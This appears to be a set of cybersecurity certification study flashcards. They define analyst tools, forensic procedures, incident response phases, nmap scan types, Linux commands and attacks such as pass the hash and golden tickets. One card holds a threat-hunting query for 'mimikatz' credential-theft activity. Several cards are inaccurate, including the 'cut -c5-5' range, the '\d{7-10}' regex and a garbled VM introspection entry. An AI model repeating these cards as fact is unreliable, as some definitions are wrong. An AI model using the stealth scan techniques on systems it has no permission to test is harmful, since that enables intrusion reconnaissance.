an authentication protocol that can be implemented as special types of OAuth flows with precisely defined token fields (*OAuth is for authorization and OpenID Connect is used for authentication*)

Runbook

an automated version of a playbook that leaves clearly defined interaction points for human analysis

Spear Phishing

an email spoofing attack targeting a specific organization or individual by seeking unauthorized access to sensitive information

Passive Scan (Vulnerability Scanner Types)

an enumeration or vulnerability scan that analyzes only intercepted network traffic rather than sending probes to a target (commonly used for threat hunting)

Report Writing (post-incident activities)

an essential analyst skill that is used to communicate information about the incident to a wide variety of stakeholders (ex. executive summary)

SQL Event Logs

an event/error log that records events with fields like date, time, and the action taken, such as server startup, individual database startup, database cache clearing, and databases not starting or shutting down unexpectedly

Business Email Compromise (BEC)

an impersonation attack in which the attacker gains control of an employees account and uses it to convince other employees to perform fraudulent actions

Command and Control (C2)

an infrastructure of hosts and services with which attackers direct, distribute, and control malware over botnets

Python and Ruby (scripting tools)

an interpreted, high-level, general-purpose programming languages used heavily by cybersecurity analysts and penetration testers

Zeek (IDS/IPS Configuration tool)

an open-source IDS for UNIX/Linux platforms that contains a scripting engine which can be used to act on significant events (notices) by generating an alert or implementing some sort of shunning mechanism

Security Onion (IDS/IPS Configuration tool)

an open-source Linux-based platform (SIEM) for security monitoring, incident response, and threat hunting and it bundles together a lot of different tools like Snort, Suricata, Zeek, Wireshark and NetworkMiner with log management and incident management tools

Graylog

an open-source SIEM with an enterprise version focused on compliance and supporting IT operations and DevOps

Pacu

an open-source cloud penetration testing framework to test the security configuration of an AWS account

Scalpel

an open-source command line tool that is part of the Sleuth Kit that is used to conduct file carving on Linux and Windows systems

The Sleuth Kit *

an open-source digital forensics collection of command line tools and programming libraries for disk imaging and file analysis that interfaces with Autopsy as a graphical user-front end interface (* free open source solution)

OWASP Zed Attack Proxy (ZAP)

an open-source interception proxy and web application vulnerability assessment tool written in java (includes crawlers to automate the discovery links and content within a web application)

The Volatility Framework

an open-source memory forensics tool that has many different modules for analyzing specific elements of memory such as a web browser module, command prompt history module, and others

Snort (IDS/IPS Configuration tool)

an open-source software available for Windows and selected Linux distributions that can operate as an IDS or IPS mode

ScoutSuite

an open-source tool written in Python that can be used to audit instances and policies created on multicloud platforms, including AWS, Azure, and Google Cloud Platform

DevOps

an organizational culture shift that combines software development and systems operations by referring to the practice of integrating the two disciplines within a company (operations and developers can build, test, and release software faster and more reliably)

Rogue Devices

an unauthorized device or service, such as a wireless access point DHCP server, or DNS server, on a corporate or private network that allows unauthorized individuals to connect to the network

Post-Incident Activity (Incident Response Phases)

analyze the incident and responses to identify whether procedures or systems could be improved

nmap -sI (TCP Idle Scan)

another stealth method, this scan makes it appear that another machine (a zombie) started the scan to hide the true identity of the scanning machine

Response Code 500-599 (URL Analysis)

any code in this range indicates a server-side issue

Response Code 400-499 (URL Analysis)

any code in this range indicates an error in the client request

Response Code 300-399 (URL Analysis)

any code in this range indicates that a redirect has occurred by the server

What information should be recorded on a chain of custody form during a forensic investigation?

any individual who worked with evidence during the investigation

Shellcode

any lightweight code designed to run an exploit on the target, which may include any type of code format from scripting languages to binary code

Snowflake Systems

any system that is different in its configuration compared to a standard template within an infrastructure as code (IaC) architecture (lack of consistency leads to security issues and inefficiencies in support)

track (rule options)

applies a rate limiter to the rule by only triggering if the threshold of events pass over a certain duration (ex. if a user comes in once every minute, then flag it but if he comes in once every hour, then ignore it)

MAC filtering

applying an ACL to a switch or access point so that only clients with approved MAC addresses can connect to it

VM Introspection (VMI)

uses installed to the hypervisor to retrieve pages of memory for analysis

statistical deviation analysis

uses the concept of mean and standard deviations to determine if a data point should be treated as suspicious

Deceive

supply false information to distort the adversary's understanding and awareness (ex. DNS redirect, honeypot)

Saved State Files (Virtualization Forensics)

suspending VM memory files are loaded into a memory analysis tool

Why do we use a SPAN?

because network traffic must be captured and its data frames decoded before it can be analyzed

TTP (Tactics, Techniques, and Procedures)

behavior patterns that were used in historical cyber-attacks and adversary actions

Threat hunting and security monitoring must use ___________ techniques to identify infections

behavioral-based

User Acceptance Testing (UAT)

beta testing by the end users that proves a program is usable and fit-for-purpose in real-world conditions

Reputation data

blacklists of known threat sources, such as malware signatures, IP address ranges, and DNS domains

How do you prevent firewalking?

block outgoing ICMP status messages

How can WPS brute force attempts be mitigated?

by enabling rate-limiting for PIN authentications (*Important Note* ALWAYS disable WPS in your wireless networks)

Output Encoding

coding methods to sanitize output by converting untrusted output into a safe form where the input is displayed as data to the user without executing as code in the browser (mitigates against code injection and XSS attacks that attempt to use input to run a script)

lsof -u root -a p 1645

command that shows us all of the files that are currently open on this computer that were opened by the user root, and that is actively using the process number 1645

du /var/log

command that tells us how much space the log directory is using on this particular computer/host

Building Automation System (BAS)

components and protocols that facilitate the centralized configuration and monitoring of mechanical and electrical systems within offices and data centers

nmap -sU (UDP Scan)

conducts a scan by sending a UDP packet to the target and waiting for a response or timeout

nmap -sX (Xmas Scan)

conducts a scan by sending a packet with the FIN, PSH, and URG flags set to one

nmap -sN (Null Scan)

conducts a scan by sending a packet with the header bit set to zero

nmap -sF (FIN Scan)

conducts a scan by sending an unexpected FIN packet

nmap -p (Port Range)

conducts a scan by targeting the specified ports instead of the default of the 1,000 most commonly used ports

nmap -sT (TCP Connect)

conducts a three-way handshake scan by sending a SYN packet to identify the port state and then sending an ACK packet once the SYN-ACK is received

nmap -sS (TCP SYN)

conducts half-open scan by sending a SYN packet to identify the port state without sending an ACK packet afterwards (requires root/administrator access to perform)

DNS Event Logs

contains a log of all the different events for each time the DNS server handles a request to convert between a domain name and an IP address

Work Product Retention

contractual method of retaining (hiring) forensic investigators so that their analysis is protected from disclosure by the work product doctrine

Access Complexity (AC) (CVSS)

high (H) or low (L)

Listener/Collector (Data Normalization)

hosts are configured to push updates to the SIEM server using a protocol like syslog or SNMP

Attribution

identification and publication of an attacker's methods, techniques, and tactics as useful threat intelligence

Framework Core

identifies five cybersecurity functions (Identify, Protect, Detect, Respond, and Recover) and each function can be divided into categories and subcategories

User-Agent Field

identifies the type of application making the request, such as the web browser version or the client's operating system

Detect

identify the presence of an adversary and the resources at their disposal (ex. Web analytics, NIDS, Vigilant user, HIDS, Audit log)

When is Sinkholing better than Blackholing?

if you want to determine the cause of the DDoS attack

VirusTotal (EDR Configuration)

inspects items with over 70 antivirus scanners and URL/domain blacklisting services, in addition to a myriad of tools to extract signals from the studied content

patching

installing a set of changes to a computer program or its supporting data designed to update, to fix, or to improve it (process: scan, patch, scan)

*Important Note* Analysts should always have forensic workstations prohibited from accessing the

internet (because if it is connected, theres a possibility your forensic workstation could be compromised with malware, remote access trojan, and compromise your data integrity)

Correlation

interpreting the relationship between individual data points to diagnose incidents of significance to the security team

Disruption

interrupt an adversary's communications or frustrate or confuse their efforts (ex. in-line AV, DEP, NIPS)

Containment (Incident Response Phases)

limit the scope and magnitude of the incident by securing data and limiting impact to business operations and your customers

nmap -sL (List Scan)

lists the IP addresses from the supplied target range(s) and performs a reverse-DNS query to discover any host names associated with those IPs (similar to DNS lookup)

Insufficient Logging and Monitoring (Cloud Threats)

logs must be copied to non-elastic storage for long-term retention (*WARNING: SaaS may not supply access to log files or monitoring tools)

Processor Security Extensions

low-level CPU changes and instructions that enable secure processing (built into your microprocessor) 1. AMD: Secure Memory Encryption (SME) & Secure Encrypted Virtualization (SEV) 2. Intel: Trusted Execution Technology (TXT) & Software Guard Extensions (SGX)

_________ is expressed as a monetary value

magnitude

Obfuscated Malware Code

malicious code whose execution the malware author has attempted to hide through various techniques such as compression, encryption, or encoding to severely limit attempts to statically analyze the malware

Commodity Malware

malicious software applications that are widely available for sale or easily obtainable and usable

________ is still likely to leave metadata on the file system even if it is fileless

malware

Dropper

malware designed to install or run other types of malware embedded in a payload on an infected host (stage 1)

Volume-based Analysis

measures a metric based on the size of something, such as disk space used or log file size

flow (rule options)

matches a new or existing TCP connection OR matches regardless of the TCP connection state

*Important Note* While most of the Windows registry is stored on the disk, some keys (like HKLM/Hardware) are only stored in memory so you should analyze the Registry via a

memory dump

[ ] (regex syntax)

matches a single instance of a character within the brackets, such as [a-z] (lowercase letter), [A-Z] (uppercase letter), [0-9] (number), [a-zA-Z0-9] (finds me an uppercase, lowercase, or number as a single digit or single character from that range), [\s] (white space), or [\d] (single digit)

+ (regex syntax)

matches one or more occurrences and is called a quantifier, such as \d+ matching one or more digits

? (regex syntax)

matches one or none times, such as \d? matching zero or one digits

{ } (regex syntax)

matches the number of times within the curly braces, such as \d{3} matching three digits or \d{7-10} matching seven to ten digits

* (regex syntax)

matches zero or more occurrences, such as \d* matching zero or more digits

Document Matching (DLP Discovery and Classification)

matching based on an entire or partial document based on hashes

Watermarking

methods and technologies that apply a unique anti-tamper signature or message to a copy of a document

URL Modifier

modifiers that can be added to the results page to affect the results, such as &pws=0 (means dont give me personalized results), &filter=0 (means dont filter the results) , and &tbs=li:1 (means do not autocorrect my search items)

"Smash the Stack"

occurs when an attacker fills up the buffer with NOP (non-operation/blank space) so that the return address may hit a NOP and continue on until it finds the attacker's code to run

Service Defacement (Anomalous Activity)

occurs when an attacker gains control of a web server and alters the websites presentation

File carving ... (Virtualization Forensics)

of a virtual machine's virtualized hard drive can identify files in the unallocated and slack space of disk images

________ and ________ is used to interpret data from different formats and standardize them into a single format for analysis and processing (Data Normalization)

parsing + normalization

Web Application Firewall

protects web applications from a variety of application layer attacks such as XXS, SQL injection, code injection, etc

Continuous Diagnostics and Mitigation (CDM)

provides US government agencies and departments with capabilities and tools to identify cybersecurity risks on an ongoing basis, prioritize these risks based upon potential impacts, and enable cybersecurity personnel to mitigate the most significant problems

DomainKeys Identified Mail (DKIM)

provides a cryptographic authentication mechanism for mail utilizing a public key published as a DNS record

Google Hacking Database (GHDB)

provides a database of search strings optimized for locating vulnerable websites and services

Degrade

reduce an adversary's capabilities or functionality, perhaps temporarily (ex. Queuing, Tarpit, Quality of Service)

Physical Network (Network Architectures)

refers to the cabling, switch ports, router ports, and wireless access points that supply cabled and wireless network access and connectivity (also includes physical security controls that are important in protecting your physical network architecture)

recycled threats

refers to the process of combining and modifying parts of existing exploit code to create new threats that are not as easily identified by automated scanning

Eradication & Recovery (Incident Response Phases)

remove the cause of the incident and bring the system back to a secure state

Destory

render an adversary's resources permanently useless or ineffective

How do you prevent CSRF attacks?

request user-specific tokens in all form submissions

Stack

reserved area of memory where the program saves the return address when a function call instruction is received

What is a key indicator of malicious activity?

resource consumption

HEAD (URL Analysis)

retrieves the headers for a resource only and ignores the body

cut -c5 syslog.txt

returns only the fifth character in each line from the syslog.txt file

cut -c5-5 syslog.txt

returns only the fifth through tenth characters in each line from the syslog.txt file

sort syslog.txt

returns the contents of the syslog.txt file in alphabetical order (a-z)

sort -n syslog.txt

returns the contents of the syslog.txt file in numerical order (0-9)

sort -k2 syslog.txt

returns the contents of the syslog.txt file in order based on the column specified, in this case the second column

sort -t "," -k2 syslog.txt

returns the contents of the syslog.txt file in order based on the column specified, such as the second column, while delimiting the columns using comma separated values

sort -r syslog.txt

returns the contents of the syslog.txt file in reverse alphabetical order (z-a)

cut -d " "-f1-4 syslog.txt

returns the first four entries of each line as delimited by the " " (space character)

Reflected, non-persistent, and persistent XSS attacks occur as ________ scripting attacks

server-side

Always use ________ _______ to conduct credentialed scans, not local administrative privileges

service accounts

Federal Information Security Management Act (FISMA)

sets forth the requirements for federal organizations to adopt information assurance controls

Sarbanes-Oxley Act (SOX)

sets forth the requirements for the storage and retention of documents relating to an organization's financial and business operations, including the type of documents to be stored and their retention periods (applies to publicly traded companies)

Gramm-Leach-Bliley Act (GLBA)

sets forth the requirements that help protect the privacy of an individual's financial information that is held by financial institutions and others

Health Insurance Portability and Accountability Act (HIPAA)

sets forth the requirements that help protect the privacy of an individual's health information that is held by healthcare providers, hospitals, and insurance companies

You are conducting an intensive vulnerability scan to detect which ports might be open to exploitation. During the scan, one of the network services becomes disabled and causes an impact on the production server. Which of the following sources of information would provide you with the most relevant information for you to use in determining which network service was interrupted and why?

syslog

The ____ command allows you to see the 10 most recent log entries in a file

tail

Risk Identification

takes place by evaluating threats, identifying vulnerabilities, and assessing the probability of an event affecting an asset or process

attackers can use _________ techniques to bury their attacks within the network noise

sparse attack (trend analysis can be used to identify these attacks)

Adversaries often use _______ _______ to reduce packets sizes and hide in the noise of the other network traffic

sparse delivery

IOC for Data Exfiltration Using HTTP

spikes in requests to PHP files or other scripts, and unusually large HTTP response packets

Maximum Tolerable Downtime (MTD) *

the longest period of time a business can be inoperable without causing irrevocable business failure

Recovery Point Objective (RPO) *

the longest period of time that an organization can tolerate lost data being unrecoverable (focused on how long you can be without your data)

Zones

the main unit of a logically segmented network (using ACLs) where the security configuration is the same for all hosts within it (e.g, DMZ)

Data Acquisition

the method and tools used to create a forensically sound copy of data from a source device, such as system memory or a hard disk

Client-based Error Codes

status codes in the 400 range

Server-based Error Codes

status codes in the 500 range

Covert Channels can be created using different ________ and ________ methods

storage, timing

Agent-based Scanning

the vulnerability scanning is conducted using a software application installed locally on each target

Server-based Scanning (Vulnerability Scanner Types)

the vulnerability scanning is launched from one or more scanning servers against the targets (ex. Nessus)

sid and rev (rule options)

this is going to be an ID rule, a Snort ID (sid) OR its going to be rev, which is the version (the revision number of that rule)

Port 3306 (TCP)

MySQL (MySQL database connection)

Port 4500 (UDP port)

NAT-T-IKE (used to set up IPsec traversal through a NAT gateway)

systemctl

Linux command that can list and monitor the startup processes using the appropriate control for the init daemon (startup process that happens every time you start the Linux system)

top

Linux command that creates a scrollable table of every running process and is constantly refreshed so that you see the most up-to-date statistics

faillog (new accounts)

Linux command that displays only authentication failures

chmod

Linux command that is used to modify permissions for files

chown

Linux command that is used to modify the owner of a file

free

Linux command that outputs a summary of the amount of used and freely available memory on the computer

lastlog (new accounts)

Linux command that retrieves the log-on history from the /var/log/lastlog file and displays the account name, the TTY, the remote host, and the last time the user was logged in

who (new accounts)

Linux command that shows what user accounts are logged in, what terminal teletypes (TTYs) they have active for each running process, and what date/time they logged in (useful for adversary hunting)

du

Linux tool enables you to retrieve how much disk space each directory is using based on the specified directory

lsof

Linux tool that retrieves a list of all files currently open on the OS (can quickly get a list of all resources a process is currently using)

df

Linux tool that retrieves how much disk space is being used by all mounted file systems and how much space is available for each

how do you create a search query to send an alert if multiple user log-on failures occur within one hour from a single account

Select (user) Where (Error.LogonFailure > 3 AND LogonFailure.User AND Duration < 1 hour) Sorted By (date, time)

A company's NetFlow collection system can handle up to 2 Gbps. Due to excessive load, this has begun to approach full utilization at various times of the day. If the security team does not have additional money in their budget to purchase a more capable collector, which of the following options could they use to collect useful data?

enable sampling of the data

Collection (Forensic Procedures)

ensure authorization to collect evidence is obtained (e.g, warrant), and then document and prove the integrity of evidence as it is collected

logging

ensure that scanning and monitoring/log retrieval systems are functioning properly following the incident

Identification (Forensic Procedures)

ensure the scene is safe, secure the scene to prevent evidence contamination, and identify the scope of evidence to be collected

A cybersecurity analyst is conducting proactive threat hunting on a network by correlating and search the Sysmon and Windows Event logs. The analyst uses the following query as part of their hunt: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Query: "mimikatz" NOT "EventCode=4658" NOT "EventCode=4689" EventCode=10 | stats count by _time, SourceImage, TargetImage, GrantedAccess -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Based on the query above, which of the following potential indicators of compromise is the threat hunter relying on?

unauthorized software

Scope (S) (CVSS)

unchanged (U) or changed (C)

a ________ rootkit is able to gain complete control over the system

kernel mode (more dangerous)

Segmentation Containment

- a mitigation strategy that achieves the isolation of a host or group of hosts using network technologies and architecture - uses VLANs, routing/subnets, and firewall ACLs to prevent communication outside the protected segment (ex. sandboxing, honeypots) - can be used to reroute adversary traffic as part of a deception defensive capability

Isolation Containment

- a mitigation strategy that involves removing an affected component from whatever larger environment it is apart of - ensure there is no longer an interface between the affected component and your production network or the Internet (ex. airgap)

Kill Chain (Attack Framework)

- a model developed by Lockheed Martin that describes the stages by which a threat actor progresses a network intrusion - 7 stages (Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command & Control, Actions on Objectives)

Behavioral Analysis

- a network monitoring system that detects changes in normal operating data sequences and identifies abnormal sequences - generates an alert whenever anything deviates outside a defined level of tolerance from a given baseline (outliers)

Anomaly Analysis

- a network monitoring system that uses a baseline of acceptable outcomes or event patterns to identify events that fall outside the acceptable range - generates an alert on any event or outcome that doesnt follow a set pattern or rule

Event Logs

- logs created by the operating system on each client or server to record how users and software interact with the system - event logs provide the name of the event, details of any errors, the event ID, the source of the event and a description of what the warning/error means

Preparation (Incident Response Phases)

- make the system resilient to attack by hardening systems, writing policies and procedures, and setting up confidential lines of communication - preparing for an incident response involves documenting your procedures, putting resources and procedures in place, and conducting training

Industrial Control Systems (ICS)

- a network that manages embedded systems (one plant) - used for electrical power stations, water suppliers, health services, telecommunications, manufacturing, and defense needs - manages the process automation by linking together PLCs using a fieldbus to make changes in the physical world (valves, motors, etc)

Distributed Reflection DoS (DRDoS) Attack

- a network-based attack where the attacker dramatically increases the bandwidth sent to a victim during a DDoS attack by implementing an amplification factor - occurs when the adversary spoofs the victims IP address and tries to open connections with multiple servers

Lateral Movement

- a technique to progressively move through a network to search for the key data and assets that are ultimately the target of an attack campaign - identifying irregular peer-to-peer communication can identify lateral movement

Supervisory Control and Data Acquisition (SCADA)

- a type of industrial control system (ICS) that manages large-scale, multiple-site devices and equipment spread over a geographic region (multiple plants) - typically run as software on ordinary computers to gather data from and manage plant devices and equipment with embedded PLCs

Reverse Proxy

- a type of proxy server that protects servers from direct contact with client requests - logs from a reverse proxy can be analyzed for indicators of attack or compromise, such as malicious code in HTTP request headers and URLs

Port 23 (TCP)

Telnet (an unsecure remote administration interface)

How can you detect privilege escalation? *

- by monitoring authentication and authorization systems (5 things to look for below) 1. unauthorized sessions 2. failed log-ons 3. new accounts 4. guest account usage 5. off-hours usage

Blackholing *

- can be used to stop a DDoS attack at the routing layer by sending traffic to the null0 interface - useful against Dark Nets - redirect all Dark Nets to a black hole until they are needed for business operations

Live Acquisition (System Memory Image Acquisition )

- capturing the contents of memory while the computer is running using a specialist hardware/software tool (e.g, Memoryze from FireEye and F-Response from TACTICAL) - generates a snapshot of data that is changing second-by-second

Act (with Example)

- carry out the decision and related changes that need to be made in response to the decision - (ex.) the user's system is isolated by an incident responder and then begin to observe again for additional indicators

Hashcat

- a command-line tool used to perform brute force and dictionary attacks against password hashes - relies on GPUs (graphical processing units) instead of CPUs to perform brute force cracking more quickly

Responder

- a command-line tool used to poison responses to NetBIOS, LLMNR, and MDNS name resolution requests in an attempt to perform a MiTM attack - designed to intercept LLMNR and NBT-NS requests and return the attacker's host IP as the name record

Modbus (ICS/SCADA)

- a communications protocol used in operational technology (OT) networks - gives control servers and SCADA hosts the ability to query and change the configuration of each PLC

Decide (with Example)

- makes suggestions towards an action or response plan while taking into consideration all of the potential outcomes - (ex.) the user's system was compromised, malware was installed by the attacker, and we should isolate the system

data submitted via a URL is delimited by the ___ character (URL Analysis)

?

Cousin Domains

A DNS domain that looks similar to another name when rendered by a Mail User Agent (MUA)

What are 2 ways SQL Injection attacks can be prevented/mitigated?

*input validation* and using least privilege when accessing a database

Sysinternals

- A suite of tools designed to assist with troubleshooting issues with Windows, and many of the tools are suited to investigating security issues - Process Explorer (one of the tools) can filter out legitimate activity (known-good) to look for signs of anomalous behavior (comparing suspicious events to your baseline)

Software-Defined Networking (SDN) *

- APIs and compatible hardware allowing for programmable network appliances and systems (essentially taking our physical networks and virtualizing them) - allows for automatic deployment and disaster recovery 1. control plane (makes decisions about how traffic should be prioritized and secured, and where it should be switched) 2. data plane (handles the actual switching and routing of traffic and imposition of ACLs for security) 3. management plane (monitors traffic conditions and network status)

Improper Key Management (Cloud Threats)

- APIs should use secure authentication and authorization such as SAML or OAuth/OIDC before accessing data - delete unnecessary keys and regenerate new keys when moving into the production environment - ensure that hardening policies are in place for your servers and workstations (*WARNING: do NOT hardcode or embed a key into the source code*)

Port 53 (UDP)

- DNS - uses UDP for DNS queries

Port 53 (TCP)

- DNS (domain name system - translates our IPs to names and our names to IPs) - uses TCP for zone transfers

Observe (with Example)

- Identify the problem or threat and gain an overall understanding of the internal and external environment - (ex.) An alert in your SIEM has been created due to an employee clicking on a link in an email

Orient (with Example)

- Involves reflecting on what has been found during observations and considering what should be done next - (ex.) identify the user's permissions, any changes identified in the user's system, and potential goals of attacker

ps

- Linux command that lists the attributes of all current processes - this command shows only processes started by the current user by default - * ps -A or ps -e will provide a full list of all running processes for all users *

OWASP *

- Open Web Application Security Project's security framework for secure application development - a charity and community that publishes a number of secure application development resources

What is the difference between SOA and Microservices?

- SOA allows applications to be built from services with interdependencies - Microservices are capable of being developed, tested, and deployed independently (easily scalable without interdependencies)

NetFlow

- a Cisco-developed means of reporting network flow information to a structured database - doesn't show the full packet captures so you will not have a complete record of whats happening

Golden Tickets

- a Kerberos ticket that can grant other tickets in an Active Directory environment - can grant administrative access to other domain members and domain controllers - allow attackers to laterally move across the entire domain with ease (*Important Note* administrators should change the krbtgt account password regularly)

Alien Vault and OSSIM (Open-Source Security Information Management)

- a SIEM solution originally developed by Alien Vault, now owned by AT&T, and rebranded as AT&T Cybersecurity - OSSIM can integrate other open-source tools, such as Snort IDS and OpenVAS vulnerability scanner, and provide an integrated web administrative tool to manage the whole security environment (all in one solution)

Maturity Model

- a component of an ESA (enterprise security architecture) framework that is used to assess the formality and optimization of security control selection and usage and address any gaps (5 levels) 1. Level 1 - Initial (highly reactive in nature) 2. Level 2 - Managed (prepare to mitigate through risk assessments) 3. Level 3 - Defined (defined policies and procedures) 4. Level 4 - Quantitatively Managed (management oversight of risks) 5. Level 5 - Optimizing (fully proactive risk-driven approach)

Hardware Root of Trust (ROT)

- a cryptographic module embedded within a computer system that can endorse trusted execution and attest to boot settings and metrics (e.g, TPM) - essentially is used to scan the boot metrics and OS files to verify their signatures, and then uses it to sign the report (digital certificate embedded inside your processor or firmware)

Threat Hunting

- a cybersecurity technique designed to detect presence of threats that have not been discovered by normal security monitoring - steps to threat hunting: analyze network traffic, analyze the executable process list, analyze other infected hosts, identify how the malicious process was executed - threat hunting consumes a lot of resources and time to conduct but can yield a lot of benefits - benefits include: improve detection capabilities, integrate intelligence, reduce attack surface, block attack vectors, identify critical assets

EnCase (Forensic Tools)

- a digital forensics case management product created by Guidance Software with built-in pathways or workflow templates that show the key steps in many types of investigations (used for both data acquisition and analysis) - file format = .e01 - also supports .dd format (disk duplication file - industry standard)

The Forensic Toolkit (FTK)

- a digital forensics investigation suite by AccessData that runs on Windows Server or server clusters for faster searching and analysis due to data indexing when importing evidence - file format = .aff - also supports .dd format

Controller Area Network (CAN)

- a digital serial data communications network used within vehicles (airplanes, cars, trains) - the primary external interface is the Onboard Diagnostics (OBD-II) module

Web Application Firewall (WAF)

- a firewall designed specifically to protect software running on web servers and their backend databases from code injection and DoS attacks - used to prevent web-based exploits and vulnerabilities like SQL injection, XML injection, and cross-site scripting (XSS) attacks

Adversary Capability

- a formal classification of resources and expertise available to a threat actor

Prescriptive Framework

- a framework that stipulates control selection and deployment - driven by regulatory compliance

Network Access Control (NAC) *

- a general term for the collected protocols, policies, and hardware that authenticate and authorize access to a network at the device level (best option of the 3) - provides the means to authenticate users and evaluate device integrity BEFORE a network connection is permitted - relies on 802.1X

Zeek (Bro)

- a hybrid tool that passive monitors a network like a sniffer and only logs data of potential interest - essentially, its going to be sampling that data just like NetFlow does but when it finds something interesting its going to log the entire thing - this helps reduce our storage and processing requirements + gives us the ability to have all this data into one single format - performs normalization of the data using JSON

Application Programming Interface (API)

- a library of programming utilities used to enable software developers to access functions of another application - allows for the automated administration, management, and monitoring of a cloud service and applications (commonly use REST or SOAP as their frameworks)

HTTP Access Logs

- a log containing HTTP traffic that encountered an error or traffic that matches some pre-defined rule set - relevant information is recorded in the common log format (CLF) or W3C extended log file format - status codes of responses indicate if an error was caused by the client or server

Cross-Site Scripting (XSS)

- a malicious script hosted on the attacker's site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site, circumventing the browser's security model of trusted zones - breaks the browser's security model since browsers assume scripting is safe (*XSS is a powerful input validation exploit*)

Beaconing

- a means for a network node to advertise its presence and establish a link with other nodes (gives an attacker the ability to establish a C2 server to communicate with malware on the infected host) - malicious beaconing usually takes the form of a simple ping or heartbeat to verify the bot is still alive in the botnet (can happen at regular intervals or different times) - beaconing can be used legitimately, such as beacon management frame being sent by a wireless access point for normal network communications (NTP servers, auto update and patching systems, cluster services) (- *Exam Tip: traditional beaconing occurs in regular intervals, such as every 5 seconds, every 15 minutes, every day, etc)

Black Hole *

- a means of mitigating DoS or intrusion attacks by silently dropping (discarding) traffic - more effective than using an ACL and a firewall - can be done at the firewall level (requires more processing power) or router level (more efficient method)

Percent Encoding

- a mechanism to encode 8-bit characters that have specific meaning in the context of URLs, also known as URL encoding - whenever you see percent encoding typically something is hidden there and further investigation is needed

DNS Zone Transfer

- a method of replicating DNS databases across a set of DNS servers that is often used during the reconnaissance phase of an attack - a zone transfer can be used to collect DNS information about your servers and give it to an attacker to plan further attacks

Heuristic Analysis

- a method that uses feature comparisons and likenesses rather than specific signature matching to identify whether the target of observation is malicious - uses machine learning to alert on behavior that is similar enough to a signature or rule

Trusted Foundry

- a microprocessor manufacturing utility that is part of a validated supply chain (one where hardware and software does not deviate from its documented function) - created and operated by the DoD

Pass the Hash

- a network-based attack where the attacker steals hashed user credentials and uses them as-is to try to authenticate to the same network the hashed credentials originated on - it is possible to present the hash without cracking the original password to authenticate to network protocols such as SMB and Kerberos - commonly used to elevate privileges (when pass the hash is used on a local workstation, then an attacker can gain local admin privileges) - (*Important Note* domain administrative accounts should ONLY be used to logon to domain controllers to prevent pass the hash form exploiting your domain)

Packet Sniffer

- a piece of hardware or software that records data from frames as they pass over a network media using methods such as a mirrored port or tap device - make sure a network sniffer is placed inside a firewall or close to an important server - you can deploy multiple sniffers within your network - tcpdump and Wireshark

Staging Areas (Disk and File System)

- a place where an adversary begins to collect data in preparation for data exfiltration, such as temporary files and folders, user profile locations, data masked as logs, alternate data streams (ADS), or in the recycle bin - data is often compressed and encrypted in the staging area (IOC#1)

Malicious Process

- a process executed without proper authorization from the system owner for the purpose of damaging or compromising the system - malware code will often be injected into a host process by making it load the malware code as a dynamic link library (DLL) within Windows - malware often uses injection into Linux shared libraries (Shared Objects or .so files)

Federation

- a process that provides a shared login capability across multiple systems and enterprises - allows the company to trust accounts created and managed by a different network

System-on-Chip (SoC) (Embedded System)

- a processor that integrates the platform functionality of multiple logical controllers onto a single chip (combines multiple PLCs into one chip) - power efficient and used with embedded systems

Burp Suite

- a proprietary interception proxy and web application assessment tool - allows for the automated scanning of vulnerabilities and crawling of an application to discover content, while providing tools for automating the modification of requests and insertion of exploits

Syslog (Mac or Linux)

- a protocol enabling different appliances and software applications to transmit logs or event records to a central server - follows a client-server model and is the de facto standard for logging of events from distributed systems across the network - syslog can refer to the protocol, the server, or the log entries themselves - runs on port 514 (UDP) over TCP/IP

NIST Cybersecurity Framework

- a risk-based framework that is focused on IT security over IT service provision - covers three main areas: framework core, implementation tiers and framework profiles

HTTP Method (URL Analysis)

- a set of request methods to indicate the desired action to be performed for a given resource - a request contains a method, a resource, a version number, the header, and the body of the request

Conditional Analysis

- a simple form of correlation performed by a machine by using signature detection and rules-based policies (IF x AND y OR z) - drawback is this type of analysis creates large numbers of false positives and cannot find zero-day or new TTPs

Endpoint Protection Platform (EPP) (endpoint protection tool)

- a software agent and monitoring system that performs multiple security tasks such as anti-virus, HIDS/HIPS, firewall, DLP, and file encryption - focused on signature-based detection

Endpoint Detection and Response (EDR)

- a software agent that collects system data and logs for analysis by a monitoring system to provide early detection of threats - focused on behavioral and anomaly analysis

Data Loss Prevention (DLP)

- a software solution that detects and prevents sensitive information from being stored on unauthorized systems or transmitted over unauthorized networks (made up of 3 components) 1. policy server (used to configure classification, confidentiality and privacy rule sets, logging + reporting) 2. endpoint agents (used to enforce policy on client computers) 3. network agents (scans network activity and protects things from leaving your network)

Heap Overflow

- a software vulnerability where input is allowed to overwrite memory locations within the area of a process' memory allocation used to store dynamically-sized variable - can overwrite those variables and possibly allow arbitrary code execution

SIEM

- a solution that provides real-time or near-real-time analysis of security alerts generated by network hardware and applications (detection and monitoring capabilities) - helps us correlate events

Attack Vector

- a specific path by which a threat actor gains unauthorized access to a system - 3 main areas to consider: cyber, human, physical

Trusted Platform Module (TPM)

- a specification for hardware-based storage of digital certificates, keys, hashed passwords, and other user and platform identification information - part of your system that allows you to have the ability to ensure that when your booting up, it is done securely and we can take those reports and digitally sign them

STIX (Structured Threat Information eXpression - Indicator Management) *

- a standard terminology for IoCs and ways of indicating relationships between them that is included as part of the OASIS Cyber Threat Intelligence (CTI) framework - JSON format (attributes and values) - STIX is build from high-level STIX domain objects (SDOs) that contain multiple attributes and values

Aircrack-ng Suite (Wireless Assessment Tools)

- a suite of utilities designed for wireless network security testing (4 tools inside of it) 1. airmon-ng 2. airodump-ng 3. aireplay-ng 4. aircrack-ng

User and Entity Behavior Analytics (UEBA) *

- a system that can provide automated identification of suspicious activity by user accounts and computer hosts - starts with a good baseline and then compares anything that goes outside that baseline as something suspicious - UEBA solutions are heavily dependent on advanced computing techniques like artificial intelligence (AI) and machine learning (heavily focuses on analytics)

URL Analysis

- activity that is performed to identify whether a link is already flagged on an existing reputation list, and if not, to identify what malicious script or activity might be coded within it - need to use the right tools to be able to: resolve percent encoding, assess redirection of the URL, show source code for scripts in URL - all of this needs to performed in a sandbox environment so you don't infect your own machine

How do you mitigate false positives when performing a vulnerability scan?

- adjust scans to a more appropriate scope - create a new baseline for a heuristic scan - add application to exception list - vulnerability exists but isn't exploitable

